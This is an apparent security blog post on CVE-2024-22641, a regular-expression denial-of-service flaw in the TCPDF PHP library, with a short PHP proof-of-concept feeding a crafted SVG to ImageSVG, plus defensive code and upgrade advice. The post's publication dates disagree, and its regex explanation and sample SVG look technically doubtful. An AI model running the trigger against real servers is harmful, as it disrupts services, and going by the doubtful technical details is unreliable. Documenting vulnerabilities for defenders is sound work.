On January 17, 2024, CVE-2024-22641 was published. This vulnerability affects TCPDF, a popular PHP library for generating PDF documents. Specifically, TCPDF versions 6.6.5 and earlier are vulnerable to a Regular Expression Denial of Service (ReDoS) attack when they process a specially crafted, malicious SVG file. In this post, we’ll break down what this means, show how it works, discuss its impact, and explain how to protect your applications.
What is TCPDF?
TCPDF (official website, GitHub) is an open-source PHP library that allows developers to generate PDF documents directly in web applications. It’s widely used in all sorts of PHP projects, from small websites to big enterprises.
A frequently-used feature of TCPDF is its ability to embed SVG (Scalable Vector Graphics) into PDFs, making it handy for dynamic reports, graphics, charts, and logos.
What is ReDoS?
Regular Expression Denial of Service (ReDoS) happens when a regular expression takes an extreme (and often unexpected) amount of time or resources to process large or specially crafted input. In web applications, where user input may be passed to regex functions, this can result in slowdowns or the server freezing, opening the door to easy denial-of-service attacks.
What is CVE-2024-22641?
CVE-2024-22641 is a vulnerability in TCPDF versions prior to 6.6.6. If you feed it an SVG with malicious content, the library’s insecure regular expressions take a painfully long time to parse it, potentially freezing your server and causing DoS (Denial of Service).
Who’s Affected?
Anyone using TCPDF 6.6.5 or earlier who allows user-supplied SVGs to be included in generated PDFs. This impacts:
How the Vulnerability Works
At the core, the problem is that TCPDF’s SVG parser uses an inefficient regular expression to scan and extract information from SVG tags. Attackers can generate SVG files with specific patterns that trigger catastrophic backtracking in this regex, causing PHP to work for seconds, minutes, or even longer—effectively blocking your server while it processes the malicious file.
In /tcpdf_include.php and other internal files, TCPDF uses code like:
preg_match_all('/<([a-zA-Z:]+)\s+([^>]*)>/s', $svg_content, $matches);
This regex is used to match each tag and its attributes. When it encounters a tag with a huge amount of whitespace or attributes, it can cause massive backtracking, especially if the input is intentionally designed to be ambiguous.
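As an added example (not code from TCPDF or from this post), the wrapper below runs a preg_match_all call under an explicit backtracking budget and treats a PCRE abort as a rejection rather than a silent false, which is the check a defender wants around any regex that sees untrusted input. It applies the post's own tag regex to the post's sample SVG, and then a classic nested-quantifier pattern to show what a blow-up looks like; the inputs, the guarded_match_all name and the 100,000-step budget are constructed for the example. preg_last_error_msg() requires PHP 8.0 or later.

```php
<?php
// Added example, not TCPDF code. PHP's PCRE engine stops a match once
// pcre.backtrack_limit steps are exceeded and reports it via preg_last_error();
// this wrapper turns that into an explicit "reject" instead of a silent false.
declare(strict_types=1);

// The tag/attribute regex quoted in the post.
const TAG_REGEX = '/<([a-zA-Z:]+)\s+([^>]*)>/s';

/**
 * Run preg_match_all() under a backtracking budget.
 * Returns the match count, or null if PCRE gave up before finishing
 * (PREG_BACKTRACK_LIMIT_ERROR or PREG_RECURSION_LIMIT_ERROR).
 */
function guarded_match_all(string $pattern, string $subject, int $budget = 100000): ?int
{
    // Budget is constructed for the example; tune it to the largest legitimate input.
    $previous = ini_set('pcre.backtrack_limit', (string) $budget);
    try {
        $count = preg_match_all($pattern, $subject, $matches);
        $error = preg_last_error();
    } finally {
        if ($previous !== false) {
            ini_set('pcre.backtrack_limit', $previous);
        }
    }
    if ($count === false || $error !== PREG_NO_ERROR) {
        // The engine aborted: log it and refuse the input instead of retrying.
        error_log('regex aborted: ' . preg_last_error_msg());
        return null;
    }
    return $count;
}

// Constructed input 1: the post's sample SVG. \s+ requires whitespace after the
// tag name, so <svg> and </svg> do not match and only the <rect ...> opening
// tag is captured.
$sample = "<svg>\n<rect a=\"x\" a=\"x\" a=\"x\" />\n</svg>";
var_dump(guarded_match_all(TAG_REGEX, $sample));

// Constructed input 2: a textbook catastrophic pattern. Each extra 'a' doubles
// the number of ways (a+)+ can be split, and the trailing '!' makes every split
// fail, so the budget runs out and the wrapper returns null instead of hanging.
$blowup = str_repeat('a', 30) . '!';
var_dump(guarded_match_all('/^(a+)+$/', $blowup));
```

The budget is the important part: a low pcre.backtrack_limit bounds the work a single request can cause, and checking preg_last_error() after every preg_* call on untrusted data is what distinguishes "no match" from "the engine gave up".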
Exploit Details
Let’s see how an attacker might trick your server using a malicious SVG.
Sample Malicious SVG Trigger
The attacker crafts an SVG containing an opening tag with thousands of spaces and insignificant attribute characters:
<svg>
<rect a="x" a="x" a="x" />
</svg>
With just a few lines like this—or, even worse, with purposeful patterns exploiting the regex—the parsing can take minutes or never complete.
Here’s example PHP code using vulnerable TCPDF to trigger high CPU usage:
<?php
require_once('tcpdf.php');
// Craft the malicious SVG input: a single <rect> opening tag carrying the same
// attribute over and over. In a real payload the a="x" line below is repeated
// many more times; the heredoc keeps only what the post shows literally.
$malicious_svg = <<<SVG
<svg>
<rect
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
a="x"
/>
</svg>
SVG;
$pdf = new TCPDF();
$pdf->AddPage();
// The '@' prefix tells ImageSVG to treat the argument as inline SVG data rather than a file path.
$pdf->ImageSVG('@' . $malicious_svg);
// This line may never be reached!
$pdf->Output('dangerous.pdf', 'I');
What Happens?
As soon as ImageSVG tries to parse the SVG, TCPDF’s regex engine is tied up processing the huge tag. PHP’s CPU usage surges, your webserver stalls, and other requests start queuing up. If this is in a shared environment or a busy web service, all resources could be exhausted.
References and More Reading
- CVE-2024-22641 at NVD
- GitHub Issue Tracking the Problem
- Official Patch Notes
How to Fix
The only way to be safe is to upgrade TCPDF to the latest version (at least version 6.6.6), where the vulnerable regular expressions have been replaced or heavily optimized.
If you manage TCPDF with Composer:
composer require tecnickcom/tcpdf
Otherwise, download the latest release and replace your TCPDF files.
Mitigation if Upgrade Isn’t Possible
If you can’t upgrade right away, NEVER accept untrusted SVG input. Consider stripping or sanitizing all <svg> content using a well-tested SVG sanitizer (e.g., SVG-Sanitizer). Do not process, store, or pass user-generated SVG directly to TCPDF.
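One way to implement that gate, as an added example that is neither TCPDF's nor svg-sanitizer's code: untrusted SVG is first parsed as strict XML and checked against size and structure limits, and only a document that passes is handed to ImageSVG. Strict parsing already rejects the post's sample (a duplicate attribute makes the document not well-formed) and any unterminated tag. The limits, the vet_untrusted_svg name and the sample inputs are constructed for the example; the version check assumes TCPDF 6.x is loaded via Composer autoload, which exposes TCPDF_STATIC::getTCPDFVersion().

```php
<?php
// Added example, not TCPDF code: a vetting step that untrusted SVG must pass
// before the library sees it. Complements, does not replace, the upgrade.
declare(strict_types=1);

require_once __DIR__ . '/vendor/autoload.php'; // assumed Composer install of tecnickcom/tcpdf

// Constructed limits; tune them to the largest SVG your application legitimately accepts.
const MAX_SVG_BYTES     = 256 * 1024;
const MAX_ATTRS_PER_TAG = 64;
const MAX_ELEMENTS      = 5000;

/**
 * Returns null if the SVG is acceptable, otherwise a short rejection reason.
 * A real XML parser refuses exactly the shapes a regex scanner struggles with:
 * unterminated tags, duplicate attributes and runaway markup are all
 * well-formedness errors, so they never reach TCPDF's regex.
 */
function vet_untrusted_svg(string $svg): ?string
{
    if (trim($svg) === '') {
        return 'empty input';
    }
    if (strlen($svg) > MAX_SVG_BYTES) {
        return 'svg too large';
    }

    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET: no network access while parsing. LIBXML_NOENT is deliberately
    // not set, so entity substitution stays off.
    $ok = $doc->loadXML($svg, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if (!$ok) {
        $first = $errors[0]->message ?? 'unknown parse error';
        return 'not well-formed XML: ' . trim($first);
    }
    if ($doc->doctype !== null) {
        return 'DOCTYPE not allowed';
    }
    $root = $doc->documentElement;
    if ($root === null || $root->localName !== 'svg') {
        return 'root element is not <svg>';
    }

    $elements = 0;
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (++$elements > MAX_ELEMENTS) {
            return 'too many elements';
        }
        if ($el->attributes->length > MAX_ATTRS_PER_TAG) {
            return 'too many attributes on <' . $el->localName . '>';
        }
    }
    return null;
}

// The gate lowers exposure but is not a substitute for the patched release.
if (version_compare(TCPDF_STATIC::getTCPDFVersion(), '6.6.6', '<')) {
    error_log('TCPDF ' . TCPDF_STATIC::getTCPDFVersion() . ' is older than 6.6.6; upgrade it');
}

// Constructed inputs: the post's sample (duplicate attributes) and a benign icon.
$candidates = [
    "<svg>\n<rect a=\"x\" a=\"x\" a=\"x\" />\n</svg>",
    '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>',
];

$pdf = new TCPDF();
$pdf->AddPage();
foreach ($candidates as $candidate) {
    $reason = vet_untrusted_svg($candidate);
    if ($reason !== null) {
        error_log('rejected SVG: ' . $reason);
        continue;
    }
    // Only vetted markup reaches the library; '@' marks inline SVG data.
    $pdf->ImageSVG('@' . $candidate, 15, 15, 60, 60);
}
$pdf->Output('vetted.pdf', 'I');
```

The order matters: the byte-size cap runs before any parser so an oversized upload is rejected in constant time, the XML parse then throws out malformed markup, and the element and attribute caps bound what a well-formed but bloated document can cost downstream.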
Conclusion
CVE-2024-22641 is a serious but easy-to-mitigate vulnerability in TCPDF. If your application processes SVG files from untrusted sources, upgrade TCPDF now. Denial-of-service bugs like this can disrupt your services, frustrate users, and even ruin business reputations. Keep your dependencies updated, and remember: never trust unchecked user input—especially SVGs!
Questions? Share your experience or concerns in the comments!
*This post is original and exclusive. Please reference the original advisories and always keep your software up to date.*
Timeline
Published on: 05/28/2024 21:16:29 UTC
Last modified on: 08/01/2024 22:51:10 UTC